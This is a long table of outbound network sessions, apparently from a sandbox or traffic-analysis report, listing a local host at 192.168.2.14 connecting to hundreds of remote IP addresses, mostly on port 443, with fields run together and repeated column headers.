                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10334192.168.2.143873848.23.225.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10335192.168.2.145706445.84.70.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10336192.168.2.144558494.5.225.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10337192.168.2.144774276.232.132.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10338192.168.2.144372017.65.57.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10339192.168.2.144453482.112.1.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10340192.168.2.144721099.253.114.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10341192.168.2.14437909.177.8.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10342192.168.2.1436964101.63.238.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10343192.168.2.1438496144.45.48.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10344192.168.2.1433830139.217.233.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10345192.168.2.1434450171.136.186.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10346192.168.2.1443838177.173.3.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10347192.168.2.143289486.72.8.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10348192.168.2.1446218133.227.91.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10349192.168.2.1443744111.155.212.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10350192.168.2.145922293.248.20.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10351192.168.2.1440254109.68.217.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10352192.168.2.144830881.238.217.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10353192.168.2.1440706210.59.151.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10354192.168.2.144931059.118.89.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10355192.168.2.1434530208.44.245.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10356192.168.2.1436936143.218.34.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10357192.168.2.1433068115.134.46.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10358192.168.2.1452992160.163.108.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10359192.168.2.145250886.12.46.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10360192.168.2.143826468.143.180.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10361192.168.2.144067893.29.187.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10362192.168.2.145519861.246.147.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10363192.168.2.1443984212.178.25.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10364192.168.2.1448294176.73.188.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10365192.168.2.14609508.140.69.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10366192.168.2.1441886135.136.119.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10367192.168.2.1446196126.39.0.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10368192.168.2.145112653.164.179.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10369192.168.2.1460872151.93.205.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10370192.168.2.1460544132.251.61.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10371192.168.2.143833839.240.121.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10372192.168.2.145342878.196.178.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10373192.168.2.144535076.104.92.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10374192.168.2.144787434.120.234.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10375192.168.2.1440368108.249.168.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10376192.168.2.144096044.155.36.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10377192.168.2.1452352143.90.71.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10378192.168.2.1453042219.43.194.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10379192.168.2.1456896178.221.108.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10380192.168.2.143414249.95.87.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10381192.168.2.1439104113.54.102.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10382192.168.2.145069269.67.3.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10383192.168.2.1445998149.55.135.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10384192.168.2.1451008141.202.177.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10385192.168.2.143510494.29.244.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10386192.168.2.1438130188.92.88.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10387192.168.2.1438242122.142.83.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10388192.168.2.1447904194.205.106.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10389192.168.2.1438864192.156.77.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10390192.168.2.1435842220.147.128.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10391192.168.2.1448250209.124.131.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10392192.168.2.143617480.37.210.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10393192.168.2.1438810178.163.139.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10394192.168.2.1456154218.48.48.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10395192.168.2.1457504116.182.229.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10396192.168.2.1447610110.32.83.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10397192.168.2.1447740211.97.117.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10398192.168.2.1440280138.219.154.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10399192.168.2.1433868158.159.221.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10400192.168.2.1435290121.178.92.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10401192.168.2.1455322202.175.61.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10402192.168.2.1457636158.200.190.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10403192.168.2.1432892156.107.113.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10404192.168.2.145957867.253.174.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10405192.168.2.1457190149.145.252.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10406192.168.2.1439712109.189.155.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10407192.168.2.1455524181.171.64.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10408192.168.2.1435956155.22.104.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10409192.168.2.144654697.162.164.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10410192.168.2.143938031.177.35.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10411192.168.2.144068086.49.185.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10412192.168.2.1455132128.102.194.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10413192.168.2.144431081.3.240.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10414192.168.2.1446526171.165.135.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10415192.168.2.1443138122.178.53.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10416192.168.2.1458320178.149.43.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10417192.168.2.1460692171.63.159.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10418192.168.2.1436830149.212.86.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10419192.168.2.1438074179.63.67.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10420192.168.2.144351077.162.68.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10421192.168.2.1442416166.162.78.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10422192.168.2.143784612.44.187.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10423192.168.2.1453536117.45.54.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10424192.168.2.145727262.242.175.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10425192.168.2.143638678.243.204.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10426192.168.2.143838281.242.96.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10427192.168.2.144451877.18.12.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10428192.168.2.144045617.40.197.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10429192.168.2.143555023.127.129.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10430192.168.2.1451418221.188.169.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10431192.168.2.145192293.218.144.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10432192.168.2.143423019.232.142.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10433192.168.2.144239496.101.190.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10434192.168.2.144896269.59.31.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10435192.168.2.1435044162.211.237.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10436192.168.2.1454030208.162.79.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10437192.168.2.1439864216.33.0.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10438192.168.2.144399696.210.34.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10439192.168.2.1455308120.201.94.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10440192.168.2.1434938100.251.56.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10441192.168.2.145212492.198.10.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10442192.168.2.1455622217.181.74.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10443192.168.2.144033820.197.73.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10444192.168.2.144951072.140.217.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10445192.168.2.143405288.29.117.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10446192.168.2.144910465.2.81.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10447192.168.2.144160042.228.90.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10448192.168.2.1442270169.73.167.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10449192.168.2.143501414.63.114.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10450192.168.2.145285853.128.214.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10451192.168.2.143762843.145.5.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10452192.168.2.144612680.181.139.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10453192.168.2.1455386178.190.221.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10454192.168.2.1437280115.193.230.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10455192.168.2.1452692106.190.75.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10456192.168.2.143998678.14.240.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10457192.168.2.145024236.234.197.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10458192.168.2.1442322104.64.174.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10459192.168.2.1449588182.115.240.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10460192.168.2.1458770160.27.219.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10461192.168.2.1459718121.174.170.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10462192.168.2.143776036.74.39.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10463192.168.2.1433230146.168.217.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10464192.168.2.1436224184.170.242.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10465192.168.2.144512850.48.57.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10466192.168.2.1456950193.13.106.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10467192.168.2.144819259.106.104.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10468192.168.2.1436588105.64.195.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10469192.168.2.145234061.139.152.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10470192.168.2.1460844123.206.164.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10471192.168.2.1455920174.211.146.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10472192.168.2.145740496.169.156.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10473192.168.2.1451526210.166.40.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10474192.168.2.144937094.188.37.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10475192.168.2.1440692174.47.59.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10476192.168.2.143894896.216.41.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10477192.168.2.143670085.193.58.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10478192.168.2.145413832.172.168.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10479192.168.2.1442000135.202.241.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10480192.168.2.1442180154.220.126.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10481192.168.2.1455892123.172.84.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10482192.168.2.144068085.161.160.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10483192.168.2.1442560220.198.203.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10484192.168.2.1436686166.120.99.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10485192.168.2.14387064.195.55.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10486192.168.2.1452686164.94.31.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10487192.168.2.1434142160.97.167.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10488192.168.2.145169493.228.118.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10489192.168.2.1455978109.112.148.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10490192.168.2.1432860208.180.198.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10491192.168.2.143423451.143.100.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10492192.168.2.144500899.71.240.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10493192.168.2.1440902173.65.31.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10494192.168.2.1458602147.130.155.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10495192.168.2.144636212.38.74.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10496192.168.2.1453790164.120.13.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10497192.168.2.14367025.215.142.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10498192.168.2.1450816158.129.85.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10499192.168.2.145835465.196.86.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10500192.168.2.144599482.231.153.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10501192.168.2.1435340115.169.203.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10502192.168.2.1440522199.76.209.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10503192.168.2.145782858.51.195.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10504192.168.2.146059040.44.23.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10505192.168.2.143742680.18.23.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10506192.168.2.1456050119.22.254.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10507192.168.2.1437484137.159.199.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10508192.168.2.1458764187.61.166.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10509192.168.2.144185219.24.135.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10510192.168.2.1435392207.22.51.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10511192.168.2.145900650.174.181.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10512192.168.2.1434704153.47.99.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10513192.168.2.145973090.128.196.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10514192.168.2.1453682198.188.53.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10515192.168.2.1445606148.197.210.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10516192.168.2.143805869.112.177.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10517192.168.2.143691846.241.222.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10518192.168.2.1451618138.196.163.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10519192.168.2.1454286176.5.36.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10520192.168.2.145423470.181.51.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10521192.168.2.1441132197.228.249.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10522192.168.2.1442658106.104.120.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10523192.168.2.1436850187.164.70.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10524192.168.2.145402462.171.83.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10525192.168.2.1436062122.116.11.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10526192.168.2.1452990187.230.91.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10527192.168.2.144023448.216.42.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10528192.168.2.146009036.34.33.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10529192.168.2.1446810188.157.151.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10530192.168.2.143558238.226.179.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10531192.168.2.143581651.134.152.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10532192.168.2.1439506166.168.127.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10533192.168.2.1455548179.167.217.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10534192.168.2.1448318217.31.231.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10535192.168.2.1451824102.219.119.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10536192.168.2.1452952191.92.187.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10537192.168.2.1446532213.113.3.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10538192.168.2.1433030128.9.82.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10539192.168.2.143327850.223.121.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10540192.168.2.1447988210.115.91.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10541192.168.2.1460282103.160.53.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10542192.168.2.1451514218.234.52.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10543192.168.2.1444658128.100.143.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10544192.168.2.145314448.178.26.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10545192.168.2.1444882106.220.188.125443
                                                        TimestampBytes transferredDirectionData


